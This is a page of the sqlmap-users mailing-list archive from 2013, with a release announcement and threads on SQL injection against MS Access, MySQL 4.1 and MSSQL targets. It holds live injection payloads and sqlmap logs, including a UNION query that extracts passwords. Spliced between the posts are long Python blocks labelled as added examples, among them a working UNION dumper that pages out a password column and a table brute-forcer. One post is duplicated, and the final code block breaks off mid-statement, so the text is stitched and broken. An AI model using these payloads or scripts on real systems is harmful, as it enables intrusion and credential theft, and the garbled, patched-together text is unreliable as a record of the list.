sqlmap-users Mailing List for sqlmap (Page 40)
From: mitchell <mit...@tu...> - 2013-03-20 22:01:25

Thank you, guys, for the invaluable tool!

~~ # m.
From: André S. <and...@gm...> - 2013-03-20 21:06:33

Great tool, great developers and I believe I can also say great support.

Thank you guys.
From: Carlos A. <car...@gm...> - 2013-03-20 21:03:15

Thanks for your time, guys! Great work!
From: Brandon P. <bpe...@gm...> - 2013-03-20 19:30:04

Thanks a lot for the hard and great work! You guys rock!

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
From: Bernardo D. A. G. <ber...@gm...> - 2013-03-20 17:12:12

Hi fellow sqlmap supporters,

After about two years' worth of development since the previous (supposedly) stable 0.9 release, a couple of hundred bug fixes, half a hundred new features developed, thousands of emails exchanged, a few public appearances at nerds' conferences and at stylish social gatherings, being called "dumb mother fuckers" by someone for "making simple and easy for anyone to hack any one else" and, on the other hand, being praised and referenced in a dozen books and presentations by others (thanks!)..

..we have cut the release and are currently wrapping the tool (including documentation, yes, for real, I can't believe it myself either) for the stable release of version 1.0 in the upcoming quarter!

If you have any further bug to report, now is the time to speak out [1].

Thanks for your feedback throughout the journey so far.. expect some news by the time the sun burns your skin in the western summer!

[1] https://github.com/sqlmapproject/sqlmap/issues/new

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
From: Bernardo D. A. G. <ber...@gm...> - 2013-03-20 16:36:09

Hi buawig,

We have a ticket to address DBMS-specific detection "limitations", https://github.com/sqlmapproject/sqlmap/issues/1 - Microsoft Access is indeed one of these cases. We could consider using the user-provided database and/or table name when these are needed at the detection phase rather than statically using hard-coded names. There are trade-offs to this thought.

With regards to the query being overly long, you can use the switch --no-cast to reduce the injected query length.

Bernardo
From: buawig <bu...@gm...> - 2013-03-20 16:31:32

To simply get the job done I changed the table name in lib/core/dicts.py:144.

After changing MSysAccessObjects to foobar, sqlmap detected the union-based SQLi, but exploitation did not work because it created very long queries and the server replied with: "query to complex".

In the end I had to extract data using boolean-based exploitation (which did work after finding a column name in the table that had unique values).
From: Miroslav S. <mir...@gm...> - 2013-03-20 14:15:40

Hi.

If there is no information_schema, then table names have to be brute-forced (there is no other way around it). You can always update txt/common-tables.txt with your "guesses".

Kind regards,
Miroslav Stampar
http://about.me/stamparm
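On MySQL 4.x there is no information_schema to enumerate, so, as Miroslav says, table names come from guessing. The following is an added example, not sqlmap's code, of the boolean-based existence check that such a brute force rests on: each guess is tested with a condition that is true when the table exists and fails (changing the page) when it does not, and responses are compared with a TRUE and a FALSE baseline taken first. It assumes a numeric parameter, a back end that accepts subqueries (MySQL 4.1 does), and a page body that is stable between identical requests; fake_page is a constructed stand-in with three tables so the script runs offline.

```python
from typing import Callable, Iterable, List

TRUE_PROBE = " AND 1=1"
FALSE_PROBE = " AND 1=2"


def existence_probe(table: str) -> str:
    """Condition that holds when `table` exists; an unknown table makes the whole
    query fail, so the page deviates from the TRUE baseline (MySQL 4.1+, numeric
    context assumed).
    """
    return f" AND (SELECT COUNT(*) FROM {table}) >= 0"


def brute_force_tables(send: Callable[[str], str], value: str,
                       wordlist: Iterable[str]) -> List[str]:
    """Return the names from `wordlist` whose existence probe reproduces the TRUE page.

    `send(param)` returns the response body for the given parameter value.
    Blank lines and '#' comments in the wordlist (txt/common-tables.txt style) are skipped.
    """
    true_page = send(value + TRUE_PROBE)
    false_page = send(value + FALSE_PROBE)
    if true_page == false_page:
        raise RuntimeError("no boolean oracle: TRUE and FALSE baselines are identical")
    found: List[str] = []
    for name in wordlist:
        name = name.strip()
        if not name or name.startswith("#"):
            continue
        if send(value + existence_probe(name)) == true_page:
            found.append(name)
    return found


# --- constructed stand-in for a MySQL 4.1 backed page (not a real target) -----------
EXISTING_TABLES = {"users", "products", "orders"}


def fake_page(param: str) -> str:
    """Mimics a page that shows an item for a true condition, nothing for a false one,
    and a generic error when the query references a table that does not exist."""
    if param.endswith("AND 1=2"):
        return "<p>No item found</p>"
    if "FROM " in param:
        table = param.split("FROM ", 1)[1].split(")", 1)[0]
        if table not in EXISTING_TABLES:
            return "<p>Database error</p>"
    return "<p>Item 1: widget</p>"


if __name__ == "__main__":
    print(brute_force_tables(fake_page, "1", ["users", "admin", "orders", "session"]))
```

Against a real target, `send` would perform the HTTP request and return the body with volatile parts (timestamps, view-state tokens) removed, otherwise the baseline comparison never matches.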
From: Mardian G. <gun...@gm...> - 2013-03-20 13:59:27

Hi,

Guys, I stumbled on a couple of MySQL < 5.0 instances (version 4.1, exactly); brute-forcing using sqlmap's standard existence check got me no tables. Any suggestions?

Thanks :))

--
Cheers,
Gunma
http://gunma.rootedker.nl
From: buawig <bu...@gm...> - 2013-03-19 19:37:24

Hi,

I've got a simple union-based SQLi (the resulting web page shows only one entry/row). Valid statements that show the numbers in the resulting HTML page:

  ...&id=123 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13 from foobar
  ...&id=123 union select top 1 1,2,3,4,5,6,7,8,9,10,11,12,13 from foobar

- foobar is an existing table (gathered via error messages in the HTML)
- password is a valid column in the foobar table

The following URL gives you one password:

  ...&id=123 union select top 1 1,2,3,4,5,6,password,8,9,10,11,12,13 from foobar

Now I wanted to hand over to sqlmap to dump all passwords:

  sqlmap -u <url> -p id --dbms="Microsoft Access" -T foobar -C password --dump

which did not work out (0 entries retrieved), but it was confirmed that the table has several hundred entries.

- sqlmap was able to detect that the number of columns is 13 (correct)
- sqlmap confirmed a boolean-based blind SQLi vulnerability (but no UNION-based SQLi)
- sqlmap was able to confirm the existence of the table name (with --tables) (echo foobar > txt/common-tables.txt)
- sqlmap was able to confirm the existence of the column name password (with --columns)

When running something like:

  --technique=U --union-cols=13 --union-char=1

sqlmap requested something *like*:

  ...id=-123 union all select 1,2,3,4,5,6,CHR(58)&CHR(111)&CHR(58),8,9,10,11,12,13 from MSysAccessObjects%00

which results in the following error message (shown in the HTML page):

  The Microsoft Jet database engine cannot find the input table or query 'MSysAccessObjects'. Make sure it exists and that its name is spelled correctly.

So if sqlmap would accept a known table name on the command line that it would use to detect/confirm the union-based SQLi vuln, instead of using "MSysAccessObjects", this would make sqlmap more useful (or simply use the table name specified in -T, or the previously brute-forced one, to detect union-based SQLi).

thanks!

PS: I did *not* run sqlmap with special --risk/--level because I don't want to send several unneeded HTTP requests if the vulnerability is already confirmed (manually). I'm using sqlmap mainly for exploitation (not so much for detection) and would appreciate it if the user could tell sqlmap how to exploit a certain SQLi (something that is already partially given with --technique, --union-cols, --union-char). I used 1.0-dev-d1ae62b.

ref:
http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html
http://unconciousmind.blogspot.com/2011/05/sqlmap-vs-webappsecurity-testing-web.html
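The two problems in this thread, sqlmap's UNION detection hard-coding MSysAccessObjects (buawig's post, Bernardo's reply about dicts.py and --no-cast) and Access having no LIMIT/OFFSET to page rows out of a one-row page, can both be handled by a small helper that takes the table name from the tester. The following is an added example, not code from sqlmap or from the posters. It assumes the numbers from the post (13 columns, the 7th one echoed, table foobar, column password, a base value such as -123 that returns no row of its own) and pages rows with the Access idiom TOP 1 ... NOT IN (SELECT TOP n ...), which needs a paging column with unique, non-NULL values, the same condition buawig hit with the boolean-based dump. The `:o:` / `:c:` markers and the fake_target function are constructed stand-ins so the script runs offline; sqlmap's trailing %00 is left out.

```python
import re
from typing import Callable, List, Optional

# Markers delimit the extracted value in the HTML; CHR() chains keep quote characters
# out of the request (assumption: any two short strings absent from the page work).
LEFT_MARK, RIGHT_MARK = ":o:", ":c:"
MARK_RE = re.compile(re.escape(LEFT_MARK) + r"(.*?)" + re.escape(RIGHT_MARK), re.S)


def access_chr(s: str) -> str:
    """Encode a literal as a Jet/Access CHR()&CHR()&... chain."""
    return "&".join(f"CHR({ord(ch)})" for ch in s)


def union_payload(n_cols: int, out_col: int, expr: str, table: str, where: str = "") -> str:
    """UNION SELECT TOP 1 with `expr` wrapped in markers in column `out_col` (1-based).

    TOP 1 because the page renders only one row; the tester-supplied `table`
    replaces the MSysAccessObjects default the post complains about. Appended to
    a base value that returns no row (e.g. -123) so the UNION row is the one shown.
    """
    cols = [str(i) for i in range(1, n_cols + 1)]
    cols[out_col - 1] = f"{access_chr(LEFT_MARK)}&({expr})&{access_chr(RIGHT_MARK)}"
    return f"UNION SELECT TOP 1 {','.join(cols)} FROM {table}{where}"


def detection_payload(n_cols: int, out_col: int, table: str) -> str:
    """Echo a known constant (CHR(49) = '1'); the marker coming back proves the UNION works."""
    return union_payload(n_cols, out_col, "CHR(49)", table)


def paged_row_payload(n_cols: int, out_col: int, column: str, table: str, offset: int) -> str:
    """Row number `offset` of `column`.

    Access has no LIMIT/OFFSET, so the first `offset` values are excluded instead:
    TOP 1 ... NOT IN (SELECT TOP offset ...). Both selects use the same implicit row
    order, and `column` must be unique and non-NULL (a NULL inside NOT IN makes the
    predicate unknown and nothing is returned).
    """
    where = ""
    if offset > 0:
        where = f" WHERE {column} NOT IN (SELECT TOP {offset} {column} FROM {table})"
    return union_payload(n_cols, out_col, column, table, where)


def extract_marked(html: str) -> Optional[str]:
    """Text between the markers, or None when the UNION row did not render."""
    m = MARK_RE.search(html)
    return None if m is None else m.group(1)


def dump_column(send: Callable[[str], str], n_cols: int, out_col: int,
                column: str, table: str, max_rows: int = 10000) -> List[str]:
    """Pull every distinct value of `column`; stops when TOP 1 returns no row."""
    if extract_marked(send(detection_payload(n_cols, out_col, table))) != "1":
        raise RuntimeError("UNION payload not reflected; check column count and table name")
    values: List[str] = []
    for offset in range(max_rows):
        value = extract_marked(send(paged_row_payload(n_cols, out_col, column, table, offset)))
        if value is None:            # NOT IN excluded every row: table exhausted
            break
        if value not in values:      # repeats only appear if the column is not unique
            values.append(value)
    return values


# --- constructed stand-in for the vulnerable page (not a real target) ----------------
SAMPLE_PASSWORDS = ["s3cret", "hunter2", "letmein"]


def fake_target(payload: str) -> str:
    """Answers only the payload shapes built above, mimicking the post's Access back end."""
    if "FROM MSysAccessObjects" in payload:
        return ("The Microsoft Jet database engine cannot find the input table or query "
                "'MSysAccessObjects'.")
    if "(CHR(49))" in payload:                       # detection probe echoes '1'
        return f"<td>{LEFT_MARK}1{RIGHT_MARK}</td>"
    m = re.search(r"SELECT TOP (\d+) password FROM foobar\)", payload)
    offset = int(m.group(1)) if m else 0
    if offset >= len(SAMPLE_PASSWORDS):
        return "<td></td>"                           # TOP 1 over an empty set: no row
    return f"<td>{LEFT_MARK}{SAMPLE_PASSWORDS[offset]}{RIGHT_MARK}</td>"


if __name__ == "__main__":
    print(dump_column(fake_target, 13, 7, "password", "foobar"))
```

Each row costs one request, so several hundred entries are several hundred requests, which is still far fewer than a boolean-based dump needs; the paging column must be chosen with the uniqueness and NULL caveats in mind.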
From: Miroslav S. <mir...@gm...> - 2013-03-11 11:36:56

Hi.

This is the wrong way to do it. The proper way is to escape double quotes with a backslash (\) on Windows OS (when calling the python interpreter). Example:

  python sqlmap.py -u .... --prefix="*\"*" .....

Kind regards,
Miroslav Stampar
http://about.me/stamparm

On Sun, Mar 10, 2013 at 10:35 AM, lars peters <lar...@ma...> wrote:
> hello, problem is solved with more double quotes on cmd: two "" = "
>
> but still injection does not work
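To see what the Windows command line actually hands to sqlmap, the following added example (not sqlmap's or the posters' code) re-implements the argument-splitting rules of the Microsoft C runtime that the Python interpreter is linked against: quotes group and are dropped, backslashes are only special in front of a quote, \" is a literal quote (Miroslav's fix), and "" inside a quoted region is a literal quote (the trick lars found). The last rule is the post-2008 CRT behaviour and is an assumption here; argv[0] really follows a simpler rule but is parsed like the rest. The roundtrip function uses subprocess.list2cmdline, the standard-library routine that builds such a line from an argv, to show the escaping in the other direction.

```python
import subprocess
from typing import List


def parse_windows_cmdline(cmdline: str) -> List[str]:
    """Split a command line the way the Microsoft C runtime builds argv.

    Rules modelled (assumed to match the post-2008 CRT):
      * whitespace separates arguments unless inside a double-quoted region;
      * a double quote toggles the quoted region and is dropped;
      * backslashes are literal unless they precede a double quote: 2n backslashes
        + quote give n backslashes and the quote is a delimiter; 2n+1 + quote give
        n backslashes and a literal quote;
      * inside a quoted region, "" yields one literal quote and stays quoted.
    """
    argv: List[str] = []
    cur: List[str] = []
    in_quotes = False
    have_token = False
    i, n = 0, len(cmdline)
    while i < n:
        ch = cmdline[i]
        if ch == "\\":
            j = i
            while j < n and cmdline[j] == "\\":
                j += 1
            count = j - i
            if j < n and cmdline[j] == '"':
                cur.append("\\" * (count // 2))
                if count % 2:                 # odd: \" is a literal quote
                    cur.append('"')
                    j += 1
            else:
                cur.append("\\" * count)      # not before a quote: all literal
            i, have_token = j, True
        elif ch == '"':
            if in_quotes and i + 1 < n and cmdline[i + 1] == '"':
                cur.append('"')               # "" inside quotes -> literal quote
                i += 2
            else:
                in_quotes = not in_quotes
                i += 1
            have_token = True
        elif ch in " \t" and not in_quotes:
            if have_token:
                argv.append("".join(cur))
                cur, have_token = [], False
            i += 1
        else:
            cur.append(ch)
            i, have_token = i + 1, True
    if have_token:
        argv.append("".join(cur))
    return argv


def roundtrip(args: List[str]) -> List[str]:
    """Quote an argv with the standard library's Windows quoting and parse it back."""
    return parse_windows_cmdline(subprocess.list2cmdline(args))


if __name__ == "__main__":
    # The three variants from this thread: the original line, the backslash
    # escape, and the doubled-quote trick. Only the last two deliver a quote.
    for line in (
        'sqlmap.py -u "http://www.testing/vuln/" --prefix=" \' " " --headers="x-forwarded-for: *"',
        'sqlmap.py --prefix="*\\"*" --headers="x-forwarded-for: *"',
        'sqlmap.py --prefix="*""*" --headers="x-forwarded-for: *"',
    ):
        print(parse_windows_cmdline(line))
```

Run against lars's original line, the parser shows why "sqlmap filters the quotes": the stray quote after --prefix opens a new quoted region that swallows " --headers=" and the quote character itself never reaches sqlmap's argv.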
From: Miroslav S. <mir...@gm...> - 2013-03-10 08:38:38

Hi.

It's not filtered by sqlmap but by the OS command prompt. Which OS do you use? Have you tried to echo that prefix string (e.g. echo "...) to see what's happening?

Kind regards,
Miroslav Stampar
From: lars p. <lar...@ma...> - 2013-03-10 08:19:41

hello,

I am trying to test a web app with injection in the x-forwarded-for header and sqlmap filters out the injection chars.

The injection is 1"' or 1'" and sqlmap changes it to 1' or 1"

  sqlmap.py -u "http://www.testing/vuln/" --prefix=" ' " " --headers="x-forwarded-for: *"    <--- is filtered

  sqlmap.py -u "http://www.testing/vuln/" --prefix=" " " --headers="x-forwarded-for: * " "    <--- is filtered

I put the spaces there to see.

Is there a fix for this?

regards, lars
From: Brian M. <Br...@EC...> - 2013-02-26 15:18:39

Miroslav, this may be the case. Since this is a common scenario, for the input field to be limited in number of characters, does sqlmap have any configuration options to overcome this obstacle? Perhaps using shorter queries or out-of-band output?
From: Miroslav S. <mir...@gm...> - 2013-02-26 15:09:36

Hi.

You can't expect sqlmap to compress a query if it needs to have the database name, table name and a query statement inside. It's physically impossible. You are advised to check out manually what's going on.

Kind regards,
Miroslav Stampar
http://about.me/stamparm
From: Matheus V. <mat...@gm...> - 2013-02-25 19:38:42

Hello!

I'm testing an ASP application running under MSSQL 2005 that is vulnerable to Microsoft SQL Server/Sybase inline queries, but I'm unable to detect the name of the database and this is preventing me from dumping data from it. I've already got some table names using '--common-tables' but no matter what tamper/tamper combination I use, I cannot dump. Can someone share any thoughts?

Thanks a lot!

Matheus.

Here is a sample of an HTTP request:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: xxxx
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: xxxx=(SELECT CHAR(58)+CHAR(109)+CHAR(119)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (9983=9983) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(100)+CHAR(97)+CHAR(122)+CHAR(58))
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
Database: All
Table: dbo.xxxx
[1 column]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| user   | non-numeric |
+--------+-------------+
From: Miroslav S. <mir...@gm...> - 2013-02-25 11:48:10

Hi.

Maybe the web server has a threshold value for the parameter value length. This looks like such a case.

Kind regards,
Miroslav Stampar

On 22.2.2013 02:23, "Brian Milliron" <Br...@ec...> wrote:
> sqlmap is able to extract db names, current user and backend info, but when I try to get tables I end up with junk data or nothing at all. I find this strange because sqlmap has identified multiple injection methods and I am on a fast local connection with the target server. This is the log file with examples of good/bad data.
>
> sqlmap identified the following injection points with a total of 118915 HTTP(s) requests:
> ---
> Place: POST
> Parameter: accountNumber
>     Type: boolean-based blind
>     Title: Generic boolean-based blind - Parameter replace (original value)
>     Payload: accountNumber=(SELECT (CASE WHEN (4906=4906) THEN 1111111 ELSE 1/(SELECT 0) END))&meterNumber=1111111&zipCode=78451&email=te...@te...&register=Register
>
>     Type: error-based
>     Title: Microsoft SQL Server/Sybase error-based - Parameter replace
>     Payload: accountNumber=(CONVERT(INT,(CHAR(58)+CHAR(111)+CHAR(109)+CHAR(100)+CHAR(58)+(SELECT (CASE WHEN (3149=3149) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(100)+CHAR(111)+CHAR(103)+CHAR(58))))&meterNumber=1111111&zipCode=78451&email=te...@te...&register=Register
>
>     Type: AND/OR time-based blind
>     Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
>     Payload: accountNumber=-9196 OR 8333=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)&meterNumber=1111111&zipCode=78451&email=te...@te...&register=Register
> ---
> web server operating system: Windows 2003
> web application technology: ASP.NET, Microsoft IIS 6.0
> back-end DBMS: Microsoft SQL Server 2008
> available databases [21]:
> [redacted]
> current user: [redacted]
> current database: [redacted]
> current user is DBA: False
>
> [6 tables]
> +-----------------------------------------------------------------------+
> | dbo.[??4c0?4A00370?520?22??2d0040005a??00??2A??58??5f0?0d00000?3c??2  |
> | dbo.[\n\n]                                                            |
> | dbo.[\n\n]                                                            |
> | dbo.[\n\n]                                                            |
> | dbo.[\n\n]                                                            |
> +-----------------------------------------------------------------------+
>
> When I use the --no-cast and --hex flags I get no data at all, and when I don't use them I get junk data. When I look at the raw request/response, in every case I see sqlmap send a test request with no injection which generates a 200 response, then follows an attempt to read the number of tables which generates a 500 error with a number in the error message. Every follow-on request generates a 200 OK response, which means that neither boolean- nor error-based methods are working and it falls back to time-based, which then also fails. Of all the correct data gathered so far, all was through error messages. However, specifying --technique=E --parse-errors does not gain any additional info. Some selected examples from the logs related to this attempt follow:
>
> ./sqlmap.py -r /root/request --fresh-queries -o --hex --no-cast -D master --tables -t ~/sqlmap
>
> [WARNING] it was not possible to count the number of entries for the SQL query provided. sqlmap will assume that it returns only one entry
> [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' and/or switch '--hex'
> [CRITICAL] unable to retrieve the tables for any database
> [WARNING] HTTP error codes detected during run:
> 500 (Internal Server Error) - 18 times
>
> %28CONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28111%29%2BCHAR%28109%29%2BCHAR%28100%29%2BCHAR%2858%29%2B%28SELECT%20master.sys.fn_varbintohexstr%28CAST%28COUNT%28master..sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name%29%20AS%20VARBINARY%28MAX%29%29%29%20FROM%20master..sysobjects%20INNER%20JOIN%20master..sysusers%20ON%20master..sysobjects.uid%20%3D%20master..sysusers.uid%20WHERE%20master..sysobjects.xtype%20IN%20%28CHAR%28117%29%2CCHAR%28118%29%29%29%2BCHAR%2858%29%2BCHAR%28100%29%2BCHAR%28111%29%2BCHAR%28103%29%2BCHAR%2858%29%29%29%29
>
> HTTP response [#2] (500 Internal Server Error):
> [Macromedia][SQLServer JDBC Driver][SQLServer]Conversion failed when converting the nvarchar value ':omd:0x00000167:dog:' to data type int.
>
> %28CONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28111%29%2BCHAR%28109%29%2BCHAR%28100%29%2BCHAR%2858%29%2B%28SELECT%20TOP%201%20SUBSTRING%28%28master.sys.fn_varbintohexstr%28CAST%28master..sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name%20AS%20VARBINARY%28MAX%29%29%29%29%2C1%2C100%29%20FROM%20master..sysobjects%20INNER%20JOIN%20master..sysusers%20ON%20master..sysobjects.uid%20%3D%20master..sysusers.uid%20WHERE%20master..sysobjects.xtype%20IN%20%28CHAR%28117%29%2CCHAR%28118%29%29%20AND%20master.sys.fn_varbintohexstr%28CAST%28master..sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name%20AS%20VARBINARY%28MAX%29%29%29%20NOT%20IN%20%28SELECT%20TOP%200%20master.sys.fn_varbintohexstr%28CAST%28master..sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name%20AS%20VARBINARY%28MAX%29%29%29%20FROM%20master..sysobjects%20INNER%20JOIN%20master..sysusers%20ON%20master..sysobjects.uid%20%3D%20master..sysusers.uid%20WHERE%20master..sysobjects.xtype%20IN%20%28CHAR%28117%29%2CCHAR%28118%29%29%20ORDER%20BY%20master..sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name%29%20ORDER%20BY%20master..sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name%29%2BCHAR%2858%29%2BCHAR%28100%29%2BCHAR%28111%29%2BCHAR%28103%29%2BCHAR%2858%29%29%29%29
>
> HTTP response [#3] (200 OK):
From: Miroslav S. <mir...@gm...> - 2013-02-22 06:42:26
Hi.

sqlmap hasn't been able to detect that it's exploitable through stacking. Maybe some characters are filtered out. Maybe you are using --proxy or --tor, which introduce lagging that causes problems like yours. Use --flush-session --time-sec=20 if you are going to retry.

The best way you could help is by using the payloads used by sqlmap in the detection phase (use -v 3 to see those) and trying those in a browser. If you are able to find out what's happening, report back.

Bye

On Feb 22, 2013 6:28 AM, "root" <ro...@cn...> wrote:
> [...]
From: root <ro...@cn...> - 2013-02-22 05:27:31
hi, all

sqlmap cannot support stacked queries in aspx+mssql?

[11:42:43] [CRITICAL] unable to prompt for an interactive operating system shell via the back-end DBMS because stacked queries SQL injection is not supported

thanks & Best Regards
From: Brian M. <Br...@EC...> - 2013-02-22 01:22:54
sqlmap is able to extract db names, current user and backend info, but when I try to get tables I end up with junk data or nothing at all. I find this strange because sqlmap has identified multiple injection methods and I am on a fast local connection with the target server. This is the log file with examples of good/bad data.

sqlmap identified the following injection points with a total of 118915 HTTP(s) requests:
---
Place: POST
Parameter: accountNumber
Type: boolean-based blind
Title: Generic boolean-based blind - Parameter replace (original value)
Payload: accountNumber=(SELECT (CASE WHEN (4906=4906) THEN 1111111 ELSE 1/(SELECT 0) END))&meterNumber=1111111&zipCode=78451&email=te...@te...&register=Register

Type: error-based
Title: Microsoft SQL Server/Sybase error-based - Parameter replace
Payload: accountNumber=(CONVERT(INT,(CHAR(58)+CHAR(111)+CHAR(109)+CHAR(100)+CHAR(58)+(SELECT (CASE WHEN (3149=3149) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(100)+CHAR(111)+CHAR(103)+CHAR(58))))&meterNumber=1111111&zipCode=78451&email=te...@te...&register=Register

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: accountNumber=-9196 OR 8333=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)&meterNumber=1111111&zipCode=78451&email=te...@te...&register=Register
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
available databases [21]:
[redacted]
current user: [redacted]
current database: [redacted]
current user is DBA: False

[6 tables]
+------------------------------------------------------------------------------------------------------------------------
| dbo.[??4c0?4A00370?520?22??2d0040005a??00??2A??58??5f0?0d00000?3c??2
|
|dbo.[\n\n]
|
|dbo.[\n\n]
|
dbo.[\n\n]

dbo.[\n\n]

+------------------------------------------------------------------------------------------------------------------------

When I use the --no-cast and --hex flags I get no data at all, and when I don't use them I get junk data. When I look at the raw request/response, in every case I see sqlmap send a test request with no injection, which generates a 200 response; then follows an attempt to read the number of tables, which generates a 500 error with a number in the error message. Every follow-on request generates a 200 OK response, which means that neither boolean- nor error-based methods are working and it falls back to time-based, which then also fails. Of all the correct data gathered so far, all was through error messages. However, specifying --technique=E --parse-errors does not gain any additional info. Some selected examples from the logs related to this attempt follow:

./sqlmap.py -r /root/request --fresh-queries -o --hex --no-cast -D master --tables -t ~/sqlmap

[WARNING] it was not possible to count the number of entries for the SQL query provided. sqlmap will assume that it returns only one entry
[WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' and/or switch '--hex'
[CRITICAL] unable to retrieve the tables for any database
[WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 18 times

%28CONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28111%29%2BCHAR%28109%29%2BCHAR%28100%29%2BCHAR%2858%29%2B%28SELECT%20master.sys.fn_varbintohexstr%28CAST%28COUNT%28master..sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name%29%20AS%20VARBINARY%28MAX%29%29%29%20FROM%20master..sysobjects%20INNER%20JOIN%20master..sysusers%20ON%20master..sysobjects.uid%20%3D%20master..sysusers.uid%20WHERE%20master..sysobjects.xtype%20IN%20%28CHAR%28117%29%2CCHAR%28118%29%29%29%2BCHAR%2858%29%2BCHAR%28100%29%2BCHAR%28111%29%2BCHAR%28103%29%2BCHAR%2858%29%29%29%29

HTTP response [#2] (500 Internal Server Error):
[Macromedia][SQLServer JDBC Driver][SQLServer]Conversion failed when converting the nvarchar value ':omd:0x00000167:dog:' to data type int.

%28CONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28111%29%2BCHAR%28109%29%2BCHAR%28100%29%2BCHAR%2858%29%2B%28SELECT%20TOP%201%20SUBSTRING%28%28master.sys.fn_varbintohexstr%28CAST%28master..sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name%20AS%20VARBINARY%28MAX%29%29%29%29%2C1%2C100%29%20FROM%20master..sysobjects%20INNER%20JOIN%20master..sysusers%20ON%20master..sysobjects.uid%20%3D%20master..sysusers.uid%20WHERE%20master..sysobjects.xtype%20IN%20%28CHAR%28117%29%2CCHAR%28118%29%29%20AND%20master.sys.fn_varbintohexstr%28CAST%28master..sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name%20AS%20VARBINARY%28MAX%29%29%29%20NOT%20IN%20%28SELECT%20TOP%200%20master.sys.fn_varbintohexstr%28CAST%28master..sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name%20AS%20VARBINARY%28MAX%29%29%29%20FROM%20master..sysobjects%20INNER%20JOIN%20master..sysusers%20ON%20master..sysobjects.uid%20%3D%20master..sysusers.uid%20WHERE%20master..sysobjects.xtype%20IN%20%28CHAR%28117%29%2CCHAR%28118%29%29%20ORDER%20BY%20master..sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name%29%20ORDER%20BY%20master..sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name%29%2BCHAR%2858%29%2BCHAR%28100%29%2BCHAR%28111%29%2BCHAR%28103%29%2BCHAR%2858%29%29%29%29

HTTP response [#3] (200 OK):
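Brian's log above shows the error-based channel at work: sqlmap wraps the value it wants between two CHAR()-built delimiters (':omd:' and ':dog:' here) and forces a CONVERT to INT so that SQL Server echoes the value back inside its error text, which the application then forwards to the client. The Python below is an added example (not sqlmap's code and not from the thread) that a defender can run over request/response pairs: it URL-decodes the body, rewrites the CHAR() concatenations into readable literals, flags the error-based signature, and pulls the leaked value out of a 500 response; the request body and error text are the ones quoted in the log, with a constructed e-mail address standing in for the redacted one.

```python
import re
from urllib.parse import unquote_plus

# A run of CHAR(n) calls joined with '+', the way the payload spells string literals.
CHAR_RUN_RE = re.compile(r"CHAR\(\d+\)(?:\+CHAR\(\d+\))*", re.IGNORECASE)
# sqlmap's error-based delimiters once decoded: a quoted ':xxx:' literal.
DELIM_LITERAL_RE = re.compile(r"':[a-z]{3}:'")
# The same delimiters around the leaked value inside the DBMS error message.
LEAKED_RE = re.compile(r":([a-z]{3}):(.*?):([a-z]{3}):")


def decode_char_calls(sql: str) -> str:
    """Replace CHAR(58)+CHAR(111)+... runs with the literal they spell."""
    def repl(match: re.Match) -> str:
        codes = re.findall(r"CHAR\((\d+)\)", match.group(0), re.IGNORECASE)
        return "'" + "".join(chr(int(c)) for c in codes) + "'"
    return CHAR_RUN_RE.sub(repl, sql)


def error_based_indicators(request_body: str) -> dict:
    """URL-decode a POST body and report the markers of the error-based technique."""
    decoded = decode_char_calls(unquote_plus(request_body))
    return {
        "decoded": decoded,
        "convert_to_int": bool(re.search(r"CONVERT\(INT,", decoded, re.IGNORECASE)),
        "delimiters": DELIM_LITERAL_RE.findall(decoded),
        "hex_cast": "fn_varbintohexstr" in decoded.lower(),
    }


def leaked_value(response_body: str):
    """Return the value SQL Server echoed between the delimiters, or None."""
    m = LEAKED_RE.search(response_body)
    return m.group(2) if m else None


def analyze(request_body: str, status: int, response_body: str) -> dict:
    """Tie request and response together the way a WAF or IDS rule would."""
    ind = error_based_indicators(request_body)
    suspicious = ind["convert_to_int"] and len(ind["delimiters"]) >= 2
    # The leak only exists because the app returns the raw driver error on a 500.
    value = leaked_value(response_body) if (suspicious and status == 500) else None
    as_int = int(value, 16) if value and value.startswith("0x") else None
    return {"sqlmap_error_based": suspicious, "leaked_value": value, "leaked_int": as_int}


# Constructed sample: the table-count request and the 500 response quoted in the thread.
COUNT_REQUEST = (
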